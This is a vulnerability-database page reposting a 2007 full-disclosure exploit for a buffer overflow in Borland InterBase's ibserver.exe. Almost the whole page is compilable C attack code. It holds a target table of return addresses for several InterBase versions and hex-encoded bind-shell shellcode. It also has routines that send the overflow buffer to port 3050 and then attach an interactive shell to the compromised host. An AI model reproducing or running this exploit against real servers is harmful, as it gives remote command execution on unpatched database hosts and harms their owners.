Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

borland-overflow.txt

🗓️ 31 Jul 2007 00:00:00Reported by BackBoneType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

borland interbase ibserver.exe buffer overflow vulnerability exploit cod

Code
`/*  
  
http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064882.html  
  
Groetjes aan mijn sletjes: Doopie, Sjaakhans, [PS] en Sleepwalker :P  
All your base are belong to FD2K2!  
  
*/  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <winsock2.h>  
#include <windows.h>  
#pragma comment(lib,"ws2_32")  
  
#define IB_PORT "3050"  
// 0xFF - 0x8, jmp 8 bytes back  
#define JMP "\x90\x90\xEB\xF7"  
// 0xFFFFFFFF - (sizeof(shellcode) + BIG_JMP SIZE), jmp to beginning of shellcode  
CHAR BIG_JMP[]="\xE9\xFF\xFF\xFF\xFF";  
// BIG_JMP SIZE  
#define BIG_JMP_SIZE 5  
  
CHAR ASCII_SHIT[]=  
"\r\n >__ _ ___\r\n"  
" / __\\26/07/2007| | __ / __\\ ___ _ __ ___ \r\n"  
" /__\\/// _` |/ __| |/ //__\\/// _ \\| '_ \\ / _ \\\r\n"  
" / \\/ \\ (_| | (__| </ \\/ \\ (_) | | | | __/\r\n"  
" \\_____/\\__,_|\\___|_|\\_\\_____/\\___/|_| |_|\\___>\r\n"  
" _______________BackBone_(c)_2007_______\r\n\r\n";  
  
struct  
{  
char* cVersion;  
DWORD dwRet;  
DWORD dwLength1;  
DWORD dwLength2;  
}  
targets[]=  
{  
{"Interbase Server 2007 <=SP1 v8.0.0.123-w32 (UNIVERSAL)",0x403D4D,2108,0x2000}, // pop,pop,ret ibserver.exe v8.0.0.123  
{"Interbase Server v7.5.0.129-w32 (UNIVERSAL)",0x403A5D,2108,0x2000}, // pop,pop,ret ibserver.exe v7.5.0.129  
{"Interbase Server v7.1.0.181-w32 (UNIVERSAL)",0x4039BD,1336,0x2000}, // pop,pop,ret ibserver.exe v7.1.0.181  
{"Interbase Server v6.0.1.6-w32 (UNIVERSAL) untested",0x403901,1336,0x2000}, // pop,pop,ret ibserver.exe v6.0.1.6  
},v;  
  
// don't change the offset  
#define PORT_OFFSET 170  
#define BIND_PORT 10282  
  
// bindshell shellcode from www.metasploit.com,mod by skylined  
unsigned char shellcode[] =  
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"  
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"  
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"  
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"  
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"  
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"  
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"  
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"  
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"  
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"  
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"  
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"  
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"  
"\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"  
"\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"  
"\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"  
"\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"  
"\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"  
"\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"  
"\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"  
"\x83\xc4\x5c\x61\xeb\x89";  
  
#define SET_BIND_PORT(p) *(USHORT*)(shellcode+PORT_OFFSET)=htons(p);  
  
unsigned long lookupaddress(const char* pchost)  
{  
unsigned long nremoteaddr = inet_addr(pchost);  
  
if (nremoteaddr == INADDR_NONE)  
{  
struct hostent* phe = gethostbyname(pchost);  
  
if (phe == 0)  
return INADDR_NONE;  
nremoteaddr = *((u_long*)phe->h_addr_list[0]);  
}  
return nremoteaddr;  
}  
  
void showusage(char* argv)  
{  
int i;  
  
printf("[*] Usage: %s ip[:port] target [bindport]\r\n", argv);  
printf("[*] Standard port=%d, Standard bindport=%d.\r\n",atoi(IB_PORT),BIND_PORT);  
printf("[*] Targets:\r\n\r\n");  
for (i=0;i<(sizeof(targets)/sizeof(v));i++)  
printf("\t%2d: %s\r\n",i,targets[i].cVersion);  
}  
  
void showinfo(void)  
{  
printf("%s",ASCII_SHIT);  
printf(" Borland Interbase ibserver.exe Create-Request Buffer Overflow Vulnerability\r\n");  
printf(" Advisory provided by TPTI-07-13.\r\n");  
printf(" Exploit by BackBone.\r\n\r\n");  
}  
  
/* ripped from TESO code and modifed by ey4s for win32 */  
void shell (int sock)  
{  
int l;  
char buf[512];  
struct timeval time;  
unsigned long ul[2];  
  
time.tv_sec = 1;  
time.tv_usec = 0;  
  
while(1)  
{  
ul[0]=1;  
ul[1]=sock;  
  
l=select(0,(fd_set*)&ul,NULL,NULL,&time);  
if(l==1)  
{  
l=recv(sock,buf,sizeof(buf),0);  
if (l<=0)  
{  
printf("\r\n[-] connection closed.\n");  
return;  
}  
l=write(1,buf,l);  
if (l<=0)  
{  
printf("\r\n[-] connection closed.\n");  
return;  
}  
}  
else  
{  
l=read(0,buf,sizeof(buf));  
if (l<=0)  
{  
printf("\r\n[-] connection closed.\n");  
return;  
}  
l=send(sock,buf,l,0);  
if (l<=0)  
{  
printf("\r\n[-] connection closed.\n");  
return;  
}  
}  
}  
}  
  
int main(int argc, char *argv[])  
{  
char *host,*port;  
unsigned long ulip;  
WSADATA wsa;  
SOCKET s;  
struct sockaddr_in sock_in;  
char buffer[16384];  
int bind,type;  
unsigned int size=0;  
DWORD dwLen1,dwLen2;  
DWORD dwBigJmp=0xFFFFFFFF;  
int i;  
  
showinfo();  
  
if (argc<3 || argc>4)  
{  
showusage(argv[0]);  
return -1;  
}  
  
host=strtok(argv[1],":");  
if((port=strtok(NULL,":"))==0)  
port=IB_PORT;  
  
if (WSAStartup(MAKEWORD(1,0),&wsa)!=0)  
{  
printf("[-] WSAStartup() error.\r\n");  
return -1;  
}  
  
ulip=lookupaddress(host);  
if (ulip==INADDR_ANY || ulip==INADDR_NONE)  
{  
printf("[-] invalid ip or host.\r\n");  
return -1;  
}  
  
if (atoi(port)<0 || atoi(port)>65534)  
{  
printf("[-] invalid port.\r\n");  
return -1;  
}  
  
type=atoi(argv[2]);  
if (type>(sizeof(targets)/sizeof(v))-1 || type<0)  
{  
printf("[-] invalid target type.\r\n");  
return -1;  
}  
  
printf("[+] Target: %s\r\n",targets[type].cVersion);  
  
bind=BIND_PORT;  
if (argc==4)  
{  
if (atoi(argv[3])>0 && atoi(argv[3])<65535)  
bind=atoi(argv[3]);  
}  
SET_BIND_PORT(bind);  
  
s=socket(AF_INET, SOCK_STREAM,0);  
if (s==INVALID_SOCKET)  
{  
printf("[-] socket() error.\r\n",s);  
return -1;  
}  
  
sock_in.sin_port=htons((u_short)atoi(port));  
sock_in.sin_family=AF_INET;  
sock_in.sin_addr.s_addr=ulip;  
  
printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff,  
(ulip>>16)&0xff,(ulip>>24)&0xff,atoi(port));  
  
if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR)  
{  
printf("Failed!\r\n");  
closesocket(s);  
WSACleanup();  
return -1;  
}  
  
printf("Ok.\r\n");  
  
// constructing the buffer  
memset(buffer,0,16384);  
  
memcpy(buffer,"\x00\x00\x00\x14\x00\x00\x00\x03",8);  
size+=8;  
  
dwLen1=htonl(targets[type].dwLength1+(sizeof(DWORD)*3));  
  
memcpy(buffer+size,&dwLen1,sizeof(DWORD));  
size+=sizeof(DWORD);  
  
memset(buffer+size,0x90,targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE));  
size+=targets[type].dwLength1-(sizeof(shellcode)+BIG_JMP_SIZE);  
  
// shellcode  
memcpy(buffer+size,shellcode,sizeof(shellcode));  
size+=sizeof(shellcode);  
  
// jump to shellcode (0xFFFFFFFF - (sizeof(shellcode)+BIG_JMP_SIZE)  
dwBigJmp-=sizeof(shellcode)+BIG_JMP_SIZE;  
// prepare jump code  
memcpy(BIG_JMP+1,&dwBigJmp,sizeof(DWORD));  
// write big jump code  
memcpy(buffer+size,BIG_JMP,BIG_JMP_SIZE);  
size+=BIG_JMP_SIZE;  
  
// jmp 8 bytes back  
memcpy(buffer+size,JMP,sizeof(DWORD));  
size+=sizeof(DWORD);  
  
// return addr  
memcpy(buffer+size,&targets[type].dwRet,sizeof(DWORD));  
size+=sizeof(DWORD);  
  
memset(buffer+size,0xFF,sizeof(DWORD));  
size+=sizeof(DWORD);  
  
dwLen2=htonl(targets[type].dwLength2);  
  
memcpy(buffer+size,&dwLen2,sizeof(DWORD));  
size+=sizeof(DWORD);  
  
memset(buffer+size,0x90,targets[type].dwLength2);  
size+=targets[type].dwLength2;  
  
printf("[+] Sending buffer (len: %u) ... ",size);  
  
if (!send(s,buffer,size,0))  
{  
printf("Failed.\r\n");  
closesocket(s);  
WSACleanup();  
return -1;  
}  
  
printf("Ok.\r\n");  
  
closesocket(s);  
  
Sleep(1000);  
  
printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulip&0xff,(ulip>>8)&0xff,  
(ulip>>16)&0xff,(ulip>>24)&0xff,bind);  
  
s=socket(AF_INET, SOCK_STREAM,0);  
if (s==INVALID_SOCKET)  
{  
printf("socket() error.\r\n",s);  
WSACleanup();  
return -1;  
}  
  
sock_in.sin_port=htons((u_short)bind);  
sock_in.sin_family=AF_INET;  
sock_in.sin_addr.s_addr=ulip;  
  
if (connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in))==SOCKET_ERROR)  
{  
printf("Failed!\r\n");  
closesocket(s);  
WSACleanup();  
return -1;  
}  
  
printf("Ok!\r\n\r\n--- w000t w000t ---\r\n\r\n");  
  
shell(s);  
  
closesocket(s);  
  
WSACleanup();  
  
return 0;  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4
borland interbase ibserver.exebuffer overflowvulnerabilityexploit codefull disclosure
22